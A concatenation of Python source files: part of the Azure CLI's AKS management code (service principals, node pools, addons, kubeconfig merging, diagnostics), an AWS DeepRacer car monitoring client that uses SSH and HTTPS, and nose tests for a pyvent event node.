"contentVersion": "1.0.0.0",
"parameters": {},
"variables": {},
"resources": [
{
"apiVersion": "2015-11-01-preview",
"type": "Microsoft.OperationsManagement/solutions",
"location": "[parameters('workspaceRegion')]",
"name": "[Concat('ContainerInsights', '(', split(parameters('workspaceResourceId'),'/')[8], ')')]",
"properties": {
"workspaceResourceId": "[parameters('workspaceResourceId')]"
},
"plan": {
"name": "[Concat('ContainerInsights', '(', split(parameters('workspaceResourceId'),'/')[8], ')')]",
"product": "[Concat('OMSGallery/', 'ContainerInsights')]",
"promotionCode": "",
"publisher": "Microsoft"
}
}
]
},
"parameters": {}
}
}
]
}
params = {
"workspaceResourceId": {
"value": workspace_resource_id
},
"workspaceRegion": {
"value": location
},
"solutionDeploymentName": {
"value": solution_deployment_name
}
}
deployment_name = 'aks-monitoring-{}'.format(unix_time_in_millis)
# publish the Container Insights solution to the Log Analytics workspace
return _invoke_deployment(cmd.cli_ctx, resource_group, deployment_name, template, params,
validate=False, no_wait=False, subscription_id=subscription_id)
def _ensure_aks_service_principal(cli_ctx,
service_principal=None,
client_secret=None,
subscription_id=None,
dns_name_prefix=None,
location=None,
name=None):
file_name_aks = 'aksServicePrincipal.json'
# TODO: This really needs to be unit tested.
rbac_client = get_graph_rbac_management_client(cli_ctx)
if not service_principal:
# --service-principal not specified, try to load it from local disk
principal_obj = load_acs_service_principal(subscription_id, file_name=file_name_aks)
if principal_obj:
service_principal = principal_obj.get('service_principal')
client_secret = principal_obj.get('client_secret')
else:
# Nothing to load, make one.
if not client_secret:
client_secret = _create_client_secret()
salt = binascii.b2a_hex(os.urandom(3)).decode('utf-8')
url = 'http://{}.{}.{}.cloudapp.azure.com'.format(salt, dns_name_prefix, location)
service_principal = _build_service_principal(rbac_client, cli_ctx, name, url, client_secret)
if not service_principal:
raise CLIError('Could not create a service principal with the right permissions. '
'Are you an Owner on this project?')
logger.info('Created a service principal: %s', service_principal)
# We don't need to add role assignment for this created SPN
else:
# --service-principal specfied, validate --client-secret was too
if not client_secret:
raise CLIError('--client-secret is required if --service-principal is specified')
store_acs_service_principal(subscription_id, client_secret, service_principal, file_name=file_name_aks)
return load_acs_service_principal(subscription_id, file_name=file_name_aks)
def _get_rg_location(ctx, resource_group_name, subscription_id=None):
groups = cf_resource_groups(ctx, subscription_id=subscription_id)
# Just do the get, we don't need the result, it will error out if the group doesn't exist.
rg = groups.get(resource_group_name)
return rg.location
def _check_cluster_autoscaler_flag(enable_cluster_autoscaler,
min_count,
max_count,
node_count,
agent_pool_profile):
if enable_cluster_autoscaler:
if min_count is None or max_count is None:
raise CLIError('Please specifying both min-count and max-count when --enable-cluster-autoscaler enabled')
if int(min_count) > int(max_count):
raise CLIError('value of min-count should be less than or equal to value of max-count')
if int(node_count) < int(min_count) or int(node_count) > int(max_count):
raise CLIError('node-count is not in the range of min-count and max-count')
agent_pool_profile.min_count = int(min_count)
agent_pool_profile.max_count = int(max_count)
agent_pool_profile.enable_auto_scaling = True
else:
if min_count is not None or max_count is not None:
raise CLIError('min-count and max-count are required for --enable-cluster-autoscaler, please use the flag')
def _create_client_secret():
# Add a special character to satsify AAD SP secret requirements
special_char = '$'
client_secret = binascii.b2a_hex(os.urandom(10)).decode('utf-8') + special_char
return client_secret
def _ensure_aks_acr(cli_ctx,
client_id,
acr_name_or_id,
subscription_id, # pylint: disable=unused-argument
detach=False):
from msrestazure.tools import is_valid_resource_id, parse_resource_id
# Check if the ACR exists by resource ID.
if is_valid_resource_id(acr_name_or_id):
try:
parsed_registry = parse_resource_id(acr_name_or_id)
acr_client = cf_container_registry_service(cli_ctx, subscription_id=parsed_registry['subscription'])
registry = acr_client.registries.get(parsed_registry['resource_group'], parsed_registry['name'])
except CloudError as ex:
raise CLIError(ex.message)
_ensure_aks_acr_role_assignment(cli_ctx, client_id, registry.id, detach)
return
# Check if the ACR exists by name accross all resource groups.
registry_name = acr_name_or_id
registry_resource = 'Microsoft.ContainerRegistry/registries'
try:
registry = get_resource_by_name(cli_ctx, registry_name, registry_resource)
except CloudError as ex:
if 'was not found' in ex.message:
raise CLIError("ACR {} not found. Have you provided the right ACR name?".format(registry_name))
raise CLIError(ex.message)
_ensure_aks_acr_role_assignment(cli_ctx, client_id, registry.id, detach)
return
def _ensure_aks_acr_role_assignment(cli_ctx,
client_id,
registry_id,
detach=False):
if detach:
if not _delete_role_assignments(cli_ctx,
'acrpull',
client_id,
scope=registry_id):
raise CLIError('Could not delete role assignments for ACR. '
'Are you an Owner on this subscription?')
return
if not _add_role_assignment(cli_ctx,
'acrpull',
client_id,
scope=registry_id):
raise CLIError('Could not create a role assignment for ACR. '
'Are you an Owner on this subscription?')
return
def aks_agentpool_show(cmd, # pylint: disable=unused-argument
client,
resource_group_name,
cluster_name,
nodepool_name):
instance = client.get(resource_group_name, cluster_name, nodepool_name)
return instance
def aks_agentpool_list(cmd, # pylint: disable=unused-argument
client,
resource_group_name,
cluster_name):
return client.list(resource_group_name, cluster_name)
def aks_agentpool_add(cmd, # pylint: disable=unused-argument,too-many-locals
client,
resource_group_name,
cluster_name,
nodepool_name,
kubernetes_version=None,
node_zones=None,
node_vm_size=None,
node_osdisk_size=0,
node_count=3,
vnet_subnet_id=None,
max_pods=0,
os_type="Linux",
min_count=None,
max_count=None,
enable_cluster_autoscaler=False,
node_taints=None,
priority="Regular",
eviction_policy="Delete",
public_ip_per_vm=False,
no_wait=False):
instances = client.list(resource_group_name, cluster_name)
for agentpool_profile in instances:
if agentpool_profile.name == nodepool_name:
raise CLIError("Node pool {} already exists, please try a different name, "
"use 'aks nodepool list' to get current list of node pool".format(nodepool_name))
taints_array = []
if node_taints is not None:
for taint in node_taints.split(','):
try:
taint = taint.strip()
taints_array.append(taint)
except ValueError:
raise CLIError('Taint does not match allowed values. Expect value such as "special=true:NoSchedule".')
if priority is not None and priority == "Low":
from knack.prompting import prompt_y_n
msg = 'Cluster Autoscaler is currently required for low-pri, enable it?'
if not prompt_y_n(msg, default="n"):
return None
enable_cluster_autoscaler = True
if min_count is None:
min_count = node_count
if max_count is None:
max_count = node_count
# add low pri taint if not already specified
low_pri_taint = "pooltype=lowpri:NoSchedule"
if low_pri_taint not in taints_array:
taints_array.append("pooltype=lowpri:NoSchedule")
if node_vm_size is None:
if os_type == "Windows":
node_vm_size = "Standard_D2s_v3"
else:
node_vm_size = "Standard_DS2_v2"
agent_pool = AgentPool(
name=nodepool_name,
count=int(node_count),
vm_size=node_vm_size,
os_type=os_type,
storage_profile=ContainerServiceStorageProfileTypes.managed_disks,
vnet_subnet_id=vnet_subnet_id,
agent_pool_type="VirtualMachineScaleSets",
max_pods=int(max_pods) if max_pods else None,
orchestrator_version=kubernetes_version,
availability_zones=node_zones,
node_taints=taints_array,
scale_set_priority=priority,
scale_set_eviction_policy=eviction_policy,
enable_node_public_ip=public_ip_per_vm
)
_check_cluster_autoscaler_flag(enable_cluster_autoscaler, min_count, max_count, node_count, agent_pool)
if node_osdisk_size:
agent_pool.os_disk_size_gb = int(node_osdisk_size)
return sdk_no_wait(no_wait, client.create_or_update, resource_group_name, cluster_name, nodepool_name, agent_pool)
def aks_agentpool_scale(cmd, # pylint: disable=unused-argument
client,
resource_group_name,
cluster_name,
nodepool_name,
node_count=3,
no_wait=False):
instance = client.get(resource_group_name, cluster_name, nodepool_name)
new_node_count = int(node_count)
if new_node_count == 0:
raise CLIError("Can't scale down to 0 nodes.")
if new_node_count == instance.count:
raise CLIError("The new node count is the same as the current node count.")
instance.count = new_node_count # pylint: disable=no-member
return sdk_no_wait(no_wait, client.create_or_update, resource_group_name, cluster_name, nodepool_name, instance)
def aks_agentpool_upgrade(cmd, # pylint: disable=unused-argument
client,
resource_group_name,
cluster_name,
kubernetes_version,
nodepool_name,
no_wait=False):
instance = client.get(resource_group_name, cluster_name, nodepool_name)
instance.orchestrator_version = kubernetes_version
return sdk_no_wait(no_wait, client.create_or_update, resource_group_name, cluster_name, nodepool_name, instance)
def aks_agentpool_update(cmd, # pylint: disable=unused-argument
client,
resource_group_name,
cluster_name,
nodepool_name,
enable_cluster_autoscaler=False,
disable_cluster_autoscaler=False,
update_cluster_autoscaler=False,
min_count=None, max_count=None,
no_wait=False):
update_flags = enable_cluster_autoscaler + disable_cluster_autoscaler + update_cluster_autoscaler
if update_flags != 1:
raise CLIError('Please specify "--enable-cluster-autoscaler" or '
'"--disable-cluster-autoscaler" or '
'"--update-cluster-autoscaler"')
instance = client.get(resource_group_name, cluster_name, nodepool_name)
node_count = instance.count
if min_count is None or max_count is None:
if enable_cluster_autoscaler or update_cluster_autoscaler:
raise CLIError('Please specifying both min-count and max-count when --enable-cluster-autoscaler or '
'--update-cluster-autoscaler set.')
if min_count is not None and max_count is not None:
if int(min_count) > int(max_count):
raise CLIError('value of min-count should be less than or equal to value of max-count.')
if int(node_count) < int(min_count) or int(node_count) > int(max_count):
raise CLIError("current node count '{}' is not in the range of min-count and max-count.".format(node_count))
if enable_cluster_autoscaler:
if instance.enable_auto_scaling:
logger.warning('Autoscaler is already enabled for this node pool.\n'
'Please run "az aks nodepool update --update-cluster-autoscaler" '
'if you want to update min-count or max-count.')
return None
instance.min_count = int(min_count)
instance.max_count = int(max_count)
instance.enable_auto_scaling = True
if update_cluster_autoscaler:
if not instance.enable_auto_scaling:
raise CLIError('Autoscaler is not enabled for this node pool.\n'
'Run "az aks nodepool update --enable-cluster-autoscaler" '
'to enable cluster with min-count and max-count.')
instance.min_count = int(min_count)
instance.max_count = int(max_count)
if disable_cluster_autoscaler:
if not instance.enable_auto_scaling:
logger.warning('Autoscaler is already disabled for this node pool.')
return None
instance.enable_auto_scaling = False
instance.min_count = None
instance.max_count = None
return sdk_no_wait(no_wait, client.create_or_update, resource_group_name, cluster_name, nodepool_name, instance)
def aks_agentpool_delete(cmd, # pylint: disable=unused-argument
client,
resource_group_name,
cluster_name,
nodepool_name,
no_wait=False):
agentpool_exists = False
instances = client.list(resource_group_name, cluster_name)
for agentpool_profile in instances:
if agentpool_profile.name.lower() == nodepool_name.lower():
agentpool_exists = True
break
if not agentpool_exists:
raise CLIError("Node pool {} doesnt exist, "
"use 'aks nodepool list' to get current node pool list".format(nodepool_name))
return sdk_no_wait(no_wait, client.delete, resource_group_name, cluster_name, nodepool_name)
def aks_disable_addons(cmd, client, resource_group_name, name, addons, no_wait=False):
instance = client.get(resource_group_name, name)
subscription_id = get_subscription_id(cmd.cli_ctx)
instance = _update_addons(
cmd,
instance,
subscription_id,
resource_group_name,
addons,
enable=False,
no_wait=no_wait
)
# send the managed cluster representation to update the addon profiles
return sdk_no_wait(no_wait, client.create_or_update, resource_group_name, name, instance)
def aks_enable_addons(cmd, client, resource_group_name, name, addons, workspace_resource_id=None,
subnet_name=None, no_wait=False):
instance = client.get(resource_group_name, name)
subscription_id = get_subscription_id(cmd.cli_ctx)
service_principal_client_id = instance.service_principal_profile.client_id
instance = _update_addons(cmd, instance, subscription_id, resource_group_name, addons, enable=True,
workspace_resource_id=workspace_resource_id, subnet_name=subnet_name, no_wait=no_wait)
if 'omsagent' in instance.addon_profiles:
_ensure_container_insights_for_monitoring(cmd, instance.addon_profiles['omsagent'])
cloud_name = cmd.cli_ctx.cloud.name
# mdm metrics supported only in Azure Public cloud so add the role assignment only in this cloud
if cloud_name.lower() == 'azurecloud':
from msrestazure.tools import resource_id
cluster_resource_id = resource_id(
subscription=subscription_id,
resource_group=resource_group_name,
namespace='Microsoft.ContainerService', type='managedClusters',
name=name
)
if not _add_role_assignment(cmd.cli_ctx, 'Monitoring Metrics Publisher',
service_principal_client_id, scope=cluster_resource_id):
logger.warning('Could not create a role assignment for Monitoring addon. '
'Are you an Owner on this subscription?')
# send the managed cluster representation to update the addon profiles
return sdk_no_wait(no_wait, client.create_or_update, resource_group_name, name, instance)
def aks_rotate_certs(cmd, client, resource_group_name, name, no_wait=True): # pylint: disable=unused-argument
return sdk_no_wait(no_wait, client.rotate_cluster_certificates, resource_group_name, name)
def _update_addons(cmd,
instance,
subscription_id,
resource_group_name,
addons,
enable,
workspace_resource_id=None,
subnet_name=None,
no_wait=False): # pylint: disable=unused-argument
# parse the comma-separated addons argument
addon_args = addons.split(',')
addon_profiles = instance.addon_profiles or {}
if 'kube-dashboard' in addon_args and 'kubeDashboard' not in addon_profiles:
addon_profiles['kubeDashboard'] = ManagedClusterAddonProfile(enabled=True)
os_type = 'Linux'
# for each addons argument
for addon_arg in addon_args:
addon = ADDONS[addon_arg]
if addon == 'aciConnector':
# only linux is supported for now, in the future this will be a user flag
addon += os_type
# addon name is case insensitive
addon = next((x for x in addon_profiles.keys() if x.lower() == addon.lower()), addon)
if enable:
# add new addons or update existing ones and enable them
addon_profile = addon_profiles.get(addon, ManagedClusterAddonProfile(enabled=False))
# special config handling for certain addons
if addon == 'omsagent':
if addon_profile.enabled:
raise CLIError('The monitoring addon is already enabled for this managed cluster.\n'
'To change monitoring configuration, run "az aks disable-addons -a monitoring"'
'before enabling it again.')
if not workspace_resource_id:
workspace_resource_id = _ensure_default_log_analytics_workspace_for_monitoring(
cmd,
subscription_id,
resource_group_name)
workspace_resource_id = workspace_resource_id.strip()
if not workspace_resource_id.startswith('/'):
workspace_resource_id = '/' + workspace_resource_id
if workspace_resource_id.endswith('/'):
workspace_resource_id = workspace_resource_id.rstrip('/')
addon_profile.config = {'logAnalyticsWorkspaceResourceID': workspace_resource_id}
elif addon.lower() == ('aciConnector' + os_type).lower():
if addon_profile.enabled:
raise CLIError('The virtual-node addon is already enabled for this managed cluster.\n'
'To change virtual-node configuration, run '
'"az aks disable-addons -a virtual-node -g {resource_group_name}" '
'before enabling it again.')
if not subnet_name:
raise CLIError('The aci-connector addon requires setting a subnet name.')
addon_profile.config = {'SubnetName': subnet_name}
addon_profiles[addon] = addon_profile
else:
if addon not in addon_profiles:
raise CLIError("The addon {} is not installed.".format(addon))
addon_profiles[addon].config = None
addon_profiles[addon].enabled = enable
instance.addon_profiles = addon_profiles
# null out the SP and AAD profile because otherwise validation complains
instance.service_principal_profile = None
instance.aad_profile = None
return instance
def aks_get_versions(cmd, client, location): # pylint: disable=unused-argument
return client.list_orchestrators(location, resource_type='managedClusters')
def _print_or_merge_credentials(path, kubeconfig, overwrite_existing):
"""Merge an unencrypted kubeconfig into the file at the specified path, or print it to
stdout if the path is "-".
"""
# Special case for printing to stdout
if path == "-":
print(kubeconfig)
return
# ensure that at least an empty ~/.kube/config exists
directory = os.path.dirname(path)
if directory and not os.path.exists(directory):
try:
os.makedirs(directory)
except OSError as ex:
if ex.errno != errno.EEXIST:
raise
if not os.path.exists(path):
with os.fdopen(os.open(path, os.O_CREAT | os.O_WRONLY, 0o600), 'wt'):
pass
# merge the new kubeconfig into the existing one
fd, temp_path = tempfile.mkstemp()
additional_file = os.fdopen(fd, 'w+t')
try:
additional_file.write(kubeconfig)
additional_file.flush()
merge_kubernetes_configurations(path, temp_path, overwrite_existing)
except yaml.YAMLError as ex:
logger.warning('Failed to merge credentials to kube config file: %s', ex)
finally:
additional_file.close()
os.remove(temp_path)
def _handle_merge(existing, addition, key, replace):
if not addition[key]:
return
if existing[key] is None:
existing[key] = addition[key]
return
for i in addition[key]:
for j in existing[key]:
if i['name'] == j['name']:
if replace or i == j:
existing[key].remove(j)
else:
from knack.prompting import prompt_y_n
msg = 'A different object named {} already exists in your kubeconfig file.\nOverwrite?'
overwrite = False
try:
overwrite = prompt_y_n(msg.format(i['name']))
except NoTTYException:
pass
if overwrite:
existing[key].remove(j)
else:
msg = 'A different object named {} already exists in {} in your kubeconfig file.'
raise CLIError(msg.format(i['name'], key))
existing[key].append(i)
def load_kubernetes_configuration(filename):
try:
with open(filename) as stream:
return yaml.safe_load(stream)
except (IOError, OSError) as ex:
if getattr(ex, 'errno', 0) == errno.ENOENT:
raise CLIError('{} does not exist'.format(filename))
except (yaml.parser.ParserError, UnicodeDecodeError) as ex:
raise CLIError('Error parsing {} ({})'.format(filename, str(ex)))
def merge_kubernetes_configurations(existing_file, addition_file, replace):
existing = load_kubernetes_configuration(existing_file)
addition = load_kubernetes_configuration(addition_file)
# rename the admin context so it doesn't overwrite the user context
for ctx in addition.get('contexts', []):
try:
if ctx['context']['user'].startswith('clusterAdmin'):
admin_name = ctx['name'] + '-admin'
addition['current-context'] = ctx['name'] = admin_name
break
except (KeyError, TypeError):
continue
if addition is None:
raise CLIError('failed to load additional configuration from {}'.format(addition_file))
if existing is None:
existing = addition
else:
_handle_merge(existing, addition, 'clusters', replace)
_handle_merge(existing, addition, 'users', replace)
_handle_merge(existing, addition, 'contexts', replace)
existing['current-context'] = addition['current-context']
# check that ~/.kube/config is only read- and writable by its owner
if platform.system() != 'Windows':
existing_file_perms = "{:o}".format(stat.S_IMODE(os.lstat(existing_file).st_mode))
if not existing_file_perms.endswith('600'):
logger.warning('%s has permissions "%s".\nIt should be readable and writable only by its owner.',
existing_file, existing_file_perms)
with open(existing_file, 'w+') as stream:
yaml.safe_dump(existing, stream, default_flow_style=False)
current_context = addition.get('current-context', 'UNKNOWN')
msg = 'Merged "{}" as current context in {}'.format(current_context, existing_file)
print(msg)
def _get_load_balancer_outbound_ips(load_balancer_outbound_ips):
"""parse load balancer profile outbound IP ids and return an array of references to the outbound IP resources"""
load_balancer_outbound_ip_resources = None
if load_balancer_outbound_ips:
load_balancer_outbound_ip_resources = \
[ResourceReference(id=x.strip()) for x in load_balancer_outbound_ips.split(',')]
return load_balancer_outbound_ip_resources
def _get_load_balancer_outbound_ip_prefixes(load_balancer_outbound_ip_prefixes):
"""parse load balancer profile outbound IP prefix ids and return an array \
of references to the outbound IP prefix resources"""
load_balancer_outbound_ip_prefix_resources = None
if load_balancer_outbound_ip_prefixes:
load_balancer_outbound_ip_prefix_resources = \
[ResourceReference(id=x.strip()) for x in load_balancer_outbound_ip_prefixes.split(',')]
return load_balancer_outbound_ip_prefix_resources
def _get_load_balancer_profile(load_balancer_managed_outbound_ip_count,
load_balancer_outbound_ips,
load_balancer_outbound_ip_prefixes):
"""parse and build load balancer profile"""
load_balancer_outbound_ip_resources = _get_load_balancer_outbound_ips(load_balancer_outbound_ips)
load_balancer_outbound_ip_prefix_resources = _get_load_balancer_outbound_ip_prefixes(
load_balancer_outbound_ip_prefixes)
load_balancer_profile = None
if any([load_balancer_managed_outbound_ip_count,
load_balancer_outbound_ip_resources,
load_balancer_outbound_ip_prefix_resources]):
load_balancer_profile = ManagedClusterLoadBalancerProfile()
if load_balancer_managed_outbound_ip_count:
load_balancer_profile.managed_outbound_ips = ManagedClusterLoadBalancerProfileManagedOutboundIPs(
count=load_balancer_managed_outbound_ip_count
)
if load_balancer_outbound_ip_resources:
load_balancer_profile.outbound_ips = ManagedClusterLoadBalancerProfileOutboundIPs(
public_ips=load_balancer_outbound_ip_resources
)
if load_balancer_outbound_ip_prefix_resources:
load_balancer_profile.outbound_ip_prefixes = ManagedClusterLoadBalancerProfileOutboundIPPrefixes(
public_ip_prefixes=load_balancer_outbound_ip_prefix_resources
)
return load_balancer_profile
def cloud_storage_account_service_factory(cli_ctx, kwargs):
from azure.cli.core.profiles import ResourceType, get_sdk
t_cloud_storage_account = get_sdk(cli_ctx, ResourceType.DATA_STORAGE, 'common#CloudStorageAccount')
account_name = kwargs.pop('account_name', None)
account_key = kwargs.pop('account_key', None)
sas_token = kwargs.pop('sas_token', None)
kwargs.pop('connection_string', None)
return t_cloud_storage_account(account_name, account_key, sas_token)
def get_storage_account_from_diag_settings(cli_ctx, resource_group_name, name):
from azure.mgmt.monitor import MonitorManagementClient
diag_settings_client = get_mgmt_service_client(cli_ctx, MonitorManagementClient).diagnostic_settings
subscription_id = get_subscription_id(cli_ctx)
aks_resource_id = '/subscriptions/{0}/resourceGroups/{1}/providers/Microsoft.ContainerService' \
'/managedClusters/{2}'.format(subscription_id, resource_group_name, name)
diag_settings = diag_settings_client.list(aks_resource_id)
if diag_settings.value:
return diag_settings.value[0].storage_account_id
print("No diag settings specified")
return None
def display_diagnostics_report(temp_kubeconfig_path): # pylint: disable=too-many-statements
if not which('kubectl'):
raise CLIError('Can not find kubectl executable in PATH')
nodes = subprocess.check_output(
["kubectl", "--kubeconfig", temp_kubeconfig_path, "get", "node", "--no-headers"],
universal_newlines=True)
logger.debug(nodes)
node_lines = nodes.splitlines()
ready_nodes = {}
for node_line in node_lines:
columns = node_line.split()
logger.debug(node_line)
if columns[1] != "Ready":
logger.warning("Node %s is not Ready. Current state is: %s.", columns[0], columns[1])
else:
ready_nodes[columns[0]] = False
logger.debug('There are %s ready nodes in the cluster', str(len(ready_nodes)))
if not ready_nodes:
logger.warning('No nodes are ready in the current cluster. Diagnostics info might not be available.')
network_config_array = []
network_status_array = []
apds_created = False
max_retry = 10
for retry in range(0, max_retry):
if not apds_created:
apd = subprocess.check_output(
["kubectl", "--kubeconfig", temp_kubeconfig_path, "get", "apd", "-n", "aks-periscope", "--no-headers"],
universal_newlines=True
)
apd_lines = apd.splitlines()
if apd_lines and 'No resources found' in apd_lines[0]:
apd_lines.pop(0)
print("Got {} diagnostic results for {} ready nodes{}\r".format(len(apd_lines),
len(ready_nodes),
'.' * retry), end='')
if len(apd_lines) < len(ready_nodes):
time.sleep(3)
else:
apds_created = True
print()
else:
for node_name in ready_nodes:
if ready_nodes[node_name]:
continue
apdName = "aks-periscope-diagnostic-" + node_name
try:
network_config = subprocess.check_output(
["kubectl", "--kubeconfig", temp_kubeconfig_path,
"get", "apd", apdName, "-n",
"aks-periscope", "-o=jsonpath={.spec.networkconfig}"],
universal_newlines=True)
logger.debug('Dns status for node %s is %s', node_name, network_config)
network_status = subprocess.check_output(
["kubectl", "--kubeconfig", temp_kubeconfig_path,
"get", "apd", apdName, "-n",
"aks-periscope", "-o=jsonpath={.spec.networkoutbound}"],
universal_newlines=True)
logger.debug('Network status for node %s is %s', node_name, network_status)
if not network_config or not network_status:
print("The diagnostics information for node {} is not ready yet. "
"Will try again in 10 seconds.".format(node_name))
time.sleep(10)
break
network_config_array += json.loads('[' + network_config + ']')
network_status_object = json.loads(network_status)
network_status_array += format_diag_status(network_status_object)
ready_nodes[node_name] = True
except subprocess.CalledProcessError as err:
raise CLIError(err.output)
print()
if network_config_array:
print("Below are the network configuration for each node: ")
print()
print(tabulate(network_config_array, headers="keys", tablefmt='simple'))
print()
else:
logger.warning("Could not get network config. "
"Please run 'az aks kanalyze' command later to get the analysis results.")
if network_status_array:
print("Below are the network connectivity results for each node:")
print()
print(tabulate(network_status_array, headers="keys", tablefmt='simple'))
else:
logger.warning("Could not get networking status. "
"Please run 'az aks kanalyze' command later to get the analysis results.")
def format_diag_status(diag_status):
for diag in diag_status:
if diag["Status"]:
if "Error:" in diag["Status"]:
diag["Status"] = f'{colorama.Fore.RED}{diag["Status"]}{colorama.Style.RESET_ALL}'
else:
diag["Status"] = f'{colorama.Fore.GREEN}{diag["Status"]}{colorama.Style.RESET_ALL}'
return diag_status
def format_bright(msg):
return f'\033[1m{colorama.Style.BRIGHT}{msg}{colorama.Style.RESET_ALL}'
def format_hyperlink(the_link):
return f'\033[1m{colorama.Style.BRIGHT}{colorama.Fore.BLUE}{the_link}{colorama.Style.RESET_ALL}'
|
silverstone.py
|
import requests
import tempfile
import shutil
import pysftp
import os
import threading
import time
import re
import logging
import paramiko
from urllib3.connection import ConnectTimeoutError
from dct.util.model import ModelMetadata, Model
class DeepRacerCar:
def __init__(self, ip, ssh_password=None, name="Car", verbose=False):
self.ip = ip
self.ssh_password = ssh_password
self.base_url = "https://{}".format(ip)
self.name = name
self.carThread = threading.Thread(target=self.monitor)
self.carThread.daemon = True
self.logThread = threading.Thread(target=self.roslog)
self.logThread.daemon = True
self.tmpdir = tempfile.mkdtemp()
self.session = requests.Session()
self.session.verify = False
self.connected = False
self.model_name = None
self.throttle = None
self.car_driving = None
self.battery_level = None
self.camera_status = None
self.stereo_status = None
self.lidar_status = None
self.verbose = verbose
def __del__(self):
if os.path.exists(self.tmpdir):
shutil.rmtree(self.tmpdir)
def roslog(self):
while True:
try:
with paramiko.SSHClient() as client:
client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
client.connect(
self.ip, 22, "deepracer", self.ssh_password, timeout=2
)
stdin, stdout, stderr = client.exec_command(
"source /opt/ros/kinetic/setup.bash; rostopic echo /rosout_agg/msg",
)
for line in iter(lambda: stdout.readline(2048), ""):
self._update_log_values(line)
except Exception as e:
print(e)
finally:
# Retry every 5 seconds.
time.sleep(5)
def monitor(self):
while True:
try:
if not self.connected:
self._connect()
# Update battery level
self._update_battery_level()
# Update sensor info
self._update_sensor_status()
if self.verbose:
print(self)
except Exception as e:
self.connected = False
print(e)
logging.info("Car '{}' disconnected".format(self.name))
finally:
# Update every 10 seconds.
time.sleep(10)
def __str__(self):
return "[{}]: Model: {} - Battery: {} - Driving: {} - Throttle: {}%".format(
self.name,
self.model,
self.battery_level,
self.car_driving,
self.throttle if self.throttle is not None else "?",
)
def connect(self):
self.carThread.start()
self.logThread.start()
def _connect(self):
try:
logging.info("Attempting to connect to {}".format(self.name))
deepracer_token_path = os.path.join(self.tmpdir, "token.txt")
# Use SSH to get the deepracer token from the cookie.
with pysftp.Connection(
self.ip, username="deepracer", password=self.ssh_password
) as sftp:
logging.info("Downloading token for {}".format(self.name))
sftp.get(
"/opt/aws/deepracer/token.txt",
deepracer_token_path,
)
with open(deepracer_token_path, "r") as f:
self.cookie = "deepracer_token={}".format(f.readlines()[0])
self.session.headers["Cookie"] = self.cookie
self.connected = True
logging.info("Car '{}' connected!".format(self.name))
except ConnectTimeoutError:
self.connected = False
logging.info("Timeout connecting to car '{}'".format(self.name))
return
except Exception as e:
logging.debug(e)
def load_model(self, model_name):
logging.info(
"Loading model '{}' from car '{}'' at {}".format(
model_name, self.name, self.ip
)
)
with pysftp.Connection(
self.ip, username="deepracer", password=self.ssh_password
) as sftp:
base_path = os.path.join(self.tmpdir, model_name)
if not os.path.exists(base_path):
os.makedirs(base_path)
model_path = os.path.join(self.tmpdir, model_name, "model.pb")
metadata_path = os.path.join(self.tmpdir, model_name, "model_metadata.json")
if not os.path.exists(model_path):
sftp.get(
"/opt/aws/deepracer/artifacts/{}/model.pb".format(model_name),
model_path,
)
if not os.path.exists(metadata_path):
sftp.get(
"/opt/aws/deepracer/artifacts/{}/model_metadata.json".format(
model_name
),
metadata_path,
)
metadata = ModelMetadata.from_file(metadata_path)
return Model.from_file(model_path, metadata), metadata
def camera_feed(self, width=480, height=360, quality=90, topic="display_mjpeg"):
assert topic in ["display_mjpeg", "overlay_msg"], "Camera topic not supported!"
return "{}/route?topic=/{}&width={}&height={}&quality={}".format(
self.base_url, topic, width, height, quality
)
def _update_battery_level(self):
res = self.session.get(
"{}/api/get_battery_level".format(self.base_url), timeout=20
)
if res.status_code != 200:
raise Exception("Error updating car battery level.")
out = res.json()
if out["success"] is True and self.battery_level != out["battery_level"]:
self.battery_level = out["battery_level"]
logging.info(
"{} battery level changed: {}".format(self.name, self.battery_level)
)
def _update_sensor_status(self):
res = self.session.get(
"{}/api/get_sensor_status".format(self.base_url), timeout=20
)
if res.status_code != 200:
raise Exception("Error updating car sensor status.")
out = res.json()
if out["success"] is True:
if self.camera_status != out["camera_status"]:
self.camera_status = out["camera_status"]
logging.info(
"Car '{}' camera_status changed: {}".format(
self.name, self.camera_status
)
)
if self.stereo_status != out["stereo_status"]:
self.stereo_status = out["stereo_status"]
logging.info(
"Car '{}' stereo_status changed: {}".format(
self.name, self.stereo_status
)
)
if self.lidar_status != out["lidar_status"]:
self.lidar_status = out["lidar_status"]
logging.info(
"Car '{}' lidar_status changed: {}".format(
self.name, self.lidar_status
)
)
def _update_log_values(self, line):
if line == "---\n":
return
line = line.lstrip('"').rstrip('"\n')
# Check if car is running
match = re.search(r"Inference task .* has (.*)", line)
if match:
state = match[1]
car_driving = True if state == "started" else False
if self.car_driving != car_driving:
self.car_driving = car_driving
logging.info(
"Car '{}' driving state changed: {}".format(
self.name, self.car_driving
)
)
return
# Find currently loaded model.
match = re.search(r"Model '(.*)' is installed", line)
if match:
if self.model_name != match[1]:
self.model_name = match[1]
logging.info(
"Car '{}' loaded model changed: {}".format(
self.name, self.model_name
)
)
return
# Find last throttle value.
match = re.search(r"Setting throttle to (\d+\.\d+)", line)
if match:
throttle = float(match[1]) * 100
if self.throttle != throttle:
self.throttle = throttle
logging.info(
"Car '{}' throttle changed: {}".format(self.name, self.throttle)
)
return
|
node_test.py
|
import time
from pyvent.node import Node
import nose.tools as nt
from multiprocessing import Process, Value
S = Value('i', 0)
def send_fn(signal='event', delay=0.25, **kargs):
n = Node(id='process', server=False)
time.sleep(delay)
n.send(signal, **kargs)
time.sleep(delay)
def listen_fn(signal='event', delay=1):
n = Node()
@n.connect(signal)
def fn(arg):
S.value = arg
time.sleep(delay)
def test_is_alive():
node = Node()
nt.assert_false(node.is_server())
node.start_server()
nt.assert_true(node.is_server())
node.stop()
nt.assert_false(node.is_server())
def test_start():
node = Node()
nt.assert_false(node.is_server())
hit = False
@node.connect('test')
def fn():
nonlocal hit
hit = True
nt.assert_true(node.is_server())
nt.assert_false(hit)
time.sleep(0.1)
node.send('test')
time.sleep(0.1)
nt.assert_true(hit)
node.stop()
def test_emit():
p = Process(target=listen_fn)
p.start()
n = Node()
time.sleep(0.1)
n.send('event', arg=1)
time.sleep(0.1)
nt.assert_equal(S.value, 1)
nt.assert_false(n.is_server())
time.sleep(0.1)
n.send('event', arg=2)
time.sleep(0.1)
nt.assert_equal(S.value, 2)
n.stop()
p.terminate()
def test_emit_2():
n = Node()
nt.assert_true(n.send('event', arg=3))
p = Process(target=listen_fn)
p.start()
time.sleep(0.2)
n.send('event', arg=3)
time.sleep(0.2)
nt.assert_equal(S.value, 3)
